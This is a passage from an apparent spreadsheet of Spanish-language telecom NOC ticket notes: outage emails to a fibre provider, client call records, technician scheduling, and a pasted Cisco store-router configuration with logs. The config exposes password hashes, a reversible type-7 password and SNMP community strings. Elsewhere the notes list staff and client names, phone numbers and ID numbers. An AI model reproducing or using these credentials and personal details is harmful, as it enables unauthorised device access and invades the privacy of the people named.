 TRAFFIC-POLICY BW_IN_10MBPS_PB_12_IN INBOUND
 TRAFFIC-POLICY PB_12_OUT OUTBOUND
 TRUST UPSTREAM DEFAULT
 QOS-PROFILE RATE_LIMIT_10MBPS INBOUND IDENTIFIER NONE
#
RETURN</t>
  </si>
  <si>
    <t>F4596660</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL PROVEEDOR PARA REVICIOIN DE ENLACES
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 3:31
PARA: NOC UFINET LATAM &lt;NOCLATAM@UFINET.COM&gt;; GRUPO SOPORTE N1 LATAM &lt;N1.LATAM@UFINET.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE SOPORTE
ESTIMADOS UFINET SOLICITO SU APOYO PARA PODER VALIDAR UNOS ENLACES QUE SE VEN DOWN.
GTGTTEL10047408C
GTGTTEL10047447C
GTGTTEL10047384C
A ESPERA DE SU RESPUESTA</t>
  </si>
  <si>
    <t>F4596662</t>
  </si>
  <si>
    <t>SE  ENVIO CORREO A PRVEEDOR PARA SOPORTE POR PARTE DE ELLOS A ESPERA DE RESPUESTA DE PORVEEDOR
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 3:31
PARA: NOC UFINET LATAM &lt;NOCLATAM@UFINET.COM&gt;; GRUPO SOPORTE N1 LATAM &lt;N1.LATAM@UFINET.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE SOPORTE
ESTIMADOS UFINET SOLICITO SU APOYO PARA PODER VALIDAR UNOS ENLACES QUE SE VEN DOWN.
GTGTTEL10047408C
GTGTTEL10047447C
GTGTTEL10047384C
A ESPERA DE SU RESPUESTA</t>
  </si>
  <si>
    <t>F4596670</t>
  </si>
  <si>
    <t>SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL EN EL CLIENTE .
ROUTER CPE ACTIVO HACE 17 HORAS
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(2)T4, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 12-JUL-11 13:50 BY PROD_REL_TEAM
ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M12, RELEASE SOFTWARE (FC1)
CC_WALMART_GT_TIENDA_4082 UPTIME IS 17 HOURS, 24 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 16:51:48 UTC THU JUN 9 2022
SYSTEM IMAGE FILE IS "FLASH0:C1900-UNIVERSALK9-MZ.SPA.151-2.T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54782KC
2 GIGABIT ETHERNET INTERFACES
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX154782KC
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_WALMART_GT_TIENDA_4082#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3006 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
!
VERSION 15.1
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_WALMART_GT_TIENDA_4082
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$JDVK$XFL8GEY3ICTTLLG97J/FG0
ENABLE PASSWORD 7 0010160A034E0A
!
NO AAA NEW-MODEL
!
NO IPV6 CEF
IP SOURCE-ROUTE
IP CEF
!
!
!
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX154782KC
!
!
USERNAME GESTIONIP PRIVILEGE 15 SECRET 5 $1$9A0F$EGBJTXYXEVYB5MTZSEFRQ1
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.125.132 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/344400299T/_/
 BANDWIDTH 3072
 IP ADDRESS 10.72.176.134 255.255.255.240
 IP OSPF NETWORK POINT-TO-MULTIPOINT NON-BROADCAST
 IP OSPF DEAD-INTERVAL 60
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
 ARP TIMEOUT 300
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.48.1.250 255.255.255.252
 RATE-LIMIT INPUT 3072000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 3072000 384000 768000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 IP OSPF NETWORK POINT-TO-POINT
 IP OSPF DEAD-INTERVAL 30
 IP OSPF MTU-IGNORE
 DUPLEX FULL
 SPEED 100
!
ROUTER OSPF 1
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 2 SUBNETS
 NETWORK 10.72.176.128 0.0.0.15 AREA 0
 NEIGHBOR 10.72.176.129
!
ROUTER OSPF 2
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 1 METRIC 20 SUBNETS
 NETWORK 22.48.1.248 0.0.0.3 AREA 0
 DEFAULT-INFORMATION ORIGINATE
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY MON003444D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION DESPENSA FAMILIAR NUEVA CONCEPCION, LOTE 170 SECTOR B NUEVA CONCEPCION
!
CONTROL-PLANE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7 09584B051E1016
 LOGGING SYNCHRONOUS
 LOGIN
LINE AUX 0
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
END
CC_WALMART_GT_TIENDA_4082#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 15 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 15 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 19 MESSAGE LINES LOGGED
LOG BUFFER (8192 BYTES):
JAN  2 12:00:02.355: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
JUN  9 16:52:01.347: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN  9 16:52:01.347: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN  9 16:52:02.527: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN  9 16:52:02.527: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN  9 16:52:03.643 UTC: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
JUN  9 16:52:04.499 UTC: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
JUN  9 16:52:05.555 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
JUN  9 16:52:06.275 UTC: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(2)T4, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 12-JUL-11 13:50 BY PROD_REL_TEAM
JUN  9 16:52:06.471 UTC: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_WALMART_GT_TIENDA_4082 IS UNDERGOING A COLD START
JUN  9 16:52:08.371 UTC: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN  9 16:52:37.195 UTC: %OSPF-5-ADJCHG: PROCESS 2, NBR 22.50.247.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN  9 16:56:07.007 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.176.129 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
JUN  9 18:01:08.123 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.176.129 ON GIGABITETHERNET0/0 FROM FULL TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN  9 18:17:49.467 UTC: %OSPF-5-ADJCHG: PROCESS 1, NBR 10.72.176.129 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
CC_WALMART_GT_TIENDA_4082#
SHOW CLOCK
10:16:21.151 UTC FRI JUN 10 2022
CC_WALMART_GT_TIENDA_4082#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.176.129           0   DC99.147A.9859  ARPA   GIGABITETHERNET0/0
INTERNET  10.72.176.134           -   CCEF.48C5.7C00  ARPA   GIGABITETHERNET0/0
INTERNET  22.48.1.249            55   7C69.F6B7.8120  ARPA   GIGABITETHERNET0/1
INTERNET  22.48.1.250             -   CCEF.48C5.7C01  ARPA   GIGABITETHERNET0/1
CC_WALMART_GT_TIENDA_4082#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
GI0/0                          UP             UP       WAN PRINCIPAL/_/344400299T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
CC_WALMART_GT_TIENDA_4082#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0         10.72.176.134   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         22.48.1.250     YES NVRAM  UP                    UP
LOOPBACK5                  10.212.125.132  YES NVRAM  UP                    UP
CC_WALMART_GT_TIENDA_4082#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN WALLMART 10.72.176.134
  PING 10.72.176.134: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.72.176.134 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.28
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALLMART 10.72.176.134
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALLMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.72.176.134/32  DIRECT  0    0                 0.0.0.0         VLANIF2301</t>
  </si>
  <si>
    <t>F4596671</t>
  </si>
  <si>
    <t>SE  ENVIO CORREO A PRVEEDOR PARA SOPORTE POR PARTE DE ELLOS A ESPERA DE RESPUESTA DE PORVEEDOR
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 3:31
PARA: NOC UFINET LATAM &lt;NOCLATAM@UFINET.COM&gt;; GRUPO SOPORTE N1 LATAM &lt;N1.LATAM@UFINET.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE SOPORTE
ESTIMADOS UFINET SOLICITO SU APOYO PARA PODER VALIDAR UNOS ENLACES QUE SE VEN DOWN.
GTGTTEL10047408C
GTGTTEL10047447C
GTGTTEL10047384C
GTGTTEL10047414C
A ESPERA DE SU RESPUESTA</t>
  </si>
  <si>
    <t>F4596683</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL PROVEEDOR PARA TENER ALGUN AVANCE
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 3:31
PARA: NOC UFINET LATAM &lt;NOCLATAM@UFINET.COM&gt;; GRUPO SOPORTE N1 LATAM &lt;N1.LATAM@UFINET.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE SOPORTE
ESTIMADOS UFINET SOLICITO SU APOYO PARA PODER VALIDAR UNOS ENLACES QUE SE VEN DOWN.
GTGTTEL10047408C
GTGTTEL10047447C
GTGTTEL10047384C
A ESPERA DE SU RESPUESTA</t>
  </si>
  <si>
    <t>F4596684</t>
  </si>
  <si>
    <t xml:space="preserve"> SE ENVIA CORREO AL PROVEEDOR PARA TENER ALGUN AVANCE
DE: RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 3:31
PARA: NOC UFINET LATAM &lt;NOCLATAM@UFINET.COM&gt;; GRUPO SOPORTE N1 LATAM &lt;N1.LATAM@UFINET.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE SOPORTE
ESTIMADOS UFINET SOLICITO SU APOYO PARA PODER VALIDAR UNOS ENLACES QUE SE VEN DOWN.
GTGTTEL10047408C
GTGTTEL10047447C
GTGTTEL10047384C
A ESPERA DE SU RESPUESTA</t>
  </si>
  <si>
    <t>F4596687</t>
  </si>
  <si>
    <t>SE VALIDA A NIVEL DE ULTIMA MILLA SE TIENE CAIDO EL SERVICIO NO SE LLEGA AL CLIENTE SE SOLICITARA APOYO PARA VALIDAR AL CLIENTE A NIVEL DE ULTIMA MILLA
     CTC UNION TECHNOLOGIES CO., LTD.      FRM220A-GSW/SNMP     VER.[1.063]
===============================================================================
THIS CHASSIS ID:[00]     CASCADED:[NO ]     MONITORED CHASSIS ID:[00]
SLOT #02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02 &gt; FRM220A-1000EAS/X        [LOCAL] VER:[1.300-1.044-0.000-0.000]
&lt;&lt;&lt; FIBER 2 INFORMATION &gt;&gt;&gt;
&lt;1&gt; : PORT ACTIVE:[ENABLE ]
&lt;2&gt; : FIBER SPEED:[100M]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t>
  </si>
  <si>
    <t>F4596732</t>
  </si>
  <si>
    <t>FRANKLIN ORELLANA/CLIENTE PIDE SE CONTINÚE SEGUIMIENTO DEL TICKET MAÑANA A LAS 08:30AM CON PERSONAL DE PR.</t>
  </si>
  <si>
    <t>F4596786</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESDRAS VASQUEZ AL 25069510 CONTESTA EL SEÑOR LUIS LOPEZ QUIEN INDICA QUE SE DEJE EN OBSERVACION POR 2 HRS MAS **
ID 2001417542
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ESDRAS VASQUEZ AL 25069510 CONTESTA EL SEÑOR SAMUEL HERNANDEZ  CONFIRMA SERVICIO ESTABLE Y OPERATIVO || AUTORIZA CIERRE DE TICKET  **
ID 2001473710
**</t>
  </si>
  <si>
    <t>F4596799</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 15:44
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; VICTOR NUNEZ (VENDOR) &lt;VICTOR.NUNEZ2@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI PALI PARAISO ID: CONTR0001394651OC
BUENAS TARDES APRECIABLE CLIENTE
LE COMENTAMOS QUE NUESTRO PERSONAL A CARGO TUVO RETRASO EN LA MOVILIZACION HACIA EL PUNTO REMOTO, NOS BRINDAN TIEMPO ESTIMADO DE LLEGADA APROXIMADAMENTE A LAS 16:30HRAS A 17:00HRS
APROXIMADAMENTE, FAVOR CONFIRMARNOS HASTA QUE HORAS PUEDEN ESPERAR.</t>
  </si>
  <si>
    <t>***-- SE COMPARE DE NUEVO A CL DATOS DEL PERSONAL Y SE LE CONFIRMA QUE SU PERSONAL PM DE AYER YA NOS HABIA GESTIONADA ACCESOS --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: SÁBADO, 11 DE JUNIO DE 2022 00:54
PARA: NOE PEREZ (VENDOR) &lt;NOE.PEREZ1@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; MALAQUIAS PANJOJ (VENDOR) &lt;MALAQUIAS.PANJOJ@WALMART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI PALI PARAISO ID: CONTR0001394651OC
ESTIMADO SR. NOE.
                ADJUNTO LOS DATOS DEL PERSONAL QUE ATENDERÁ, SEGÚN NOS CONFIRMAN ES EL MISMO PERSONAL PARA EL CUAL NOS HABÍAN APOYADA A GESTIONAR ACCESO EL SR. MALAQUIAS Y SR SAUL.
JORGE SOLANO MENA
ID: 304320872
EFREN ROMERO ROMERO
ID: 117580807
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIAN DATOS A CLIENTE DEL PERSONAL A CARO
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 16:20
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; VICTOR NUNEZ (VENDOR) &lt;VICTOR.NUNEZ2@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI PALI PARAISO ID: CONTR0001394651OC
BUENAS TARDES APRECIABLE CLIENTE
LE COMPARTIMOS LOS DATOS DEL PERSONAL QUE SE HARÁN PRESENTE EN LAS INSTALACIONES
FAVOR SU APOYO COORDINANDO ACCESOS.
JORGE SOLANO MENA
ID: 304320872
EFREN ROMERO ROMERO
ID: 117580807</t>
  </si>
  <si>
    <t>F4596810</t>
  </si>
  <si>
    <t>SE PROCEDE A REALIZAR PRUEBAS CON CLIENTE ALEJANDRA MENDOZA 55269368
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4596845</t>
  </si>
  <si>
    <t>CCR HONDURAS				
	WO OPEN                                			8:47:00 A. M.
1/4	LUIS SANDRES           	89904245	2.5 HORAS	11:17:00
2/4	FRANKLIN BUESO  	89904208	3 HORAS	11:47:00
3/4	MANUEL LARIOS   	31921638	5 HORAS	13:47:00
4/4	PASTOR RAMIREZ  	33910016	6 HORAS	14:47:00</t>
  </si>
  <si>
    <t>F4596859</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. JIMMY ESPINOZA +503 7852 0744 CONFIRMA Y VALIDA ENLACE OPERATIVO, SE PROCEDE AL CIERRE DEL INCIDENTE, ID: 2001358120.
CC_LA_COMERCIAL_GT_INTERNET_KM_26.5_VILLA_CANALES#PING 8.8.8.8 SOURCE VLAN 1 RE 3000 DF-BIT
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 3000, 100-BYTE ICMP ECHOS TO 8.8.8.8, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 190.149.162.193
PACKET SENT WITH THE DF BIT SET
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
